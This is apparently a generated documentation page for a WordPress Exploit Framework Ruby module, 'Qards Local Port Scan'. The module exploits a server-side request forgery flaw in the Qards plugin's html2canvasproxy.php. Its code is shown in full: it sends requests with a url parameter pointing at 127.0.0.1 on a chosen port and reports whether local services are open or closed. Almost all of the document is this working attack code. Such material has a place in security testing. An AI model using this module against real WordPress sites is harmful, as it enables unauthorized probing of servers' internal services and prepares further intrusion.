class Wpxf::Auxiliary::QardsLocalPortScan

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 6
def initialize
  super

  update_info(
    name: 'Qards Local Port Scan',
    desc: %(
      This module exploits a server side request forgery vulnerability, which
      enables a remote user to check if a service is running on a local port.
    ),
    author: [
      'theMiddle', # Disclosure
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '8933']
    ],
    date: 'Oct 11 2017'
  )

  register_options([
    PortOption.new(
      name: 'lport',
      desc: 'The port number to scan',
      required: true,
      default: 22
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 35
def check
  res = execute_get_request(url: scan_url)
  res&.code == 200 ? :vulnerable : :safe
end
lport() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 44
def lport
  normalized_option_value('lport')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 48
def run
  return false unless super

  res = execute_get_request(url: scan_url, params: { 'url' => "http://127.0.0.1:#{lport}" })

  unless res&.code == 200
    emit_error 'Response code was not 200', true
    return false
  end

  if res.body.match?(/SOCKET: Connection refused/)
    emit_warning "Port #{lport} is closed"
  else
    emit_success "Port #{lport} is open"
  end

  true
end
scan_url() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 40
def scan_url
  normalize_uri(wordpress_url_plugins, 'qards', 'html2canvasproxy.php')
end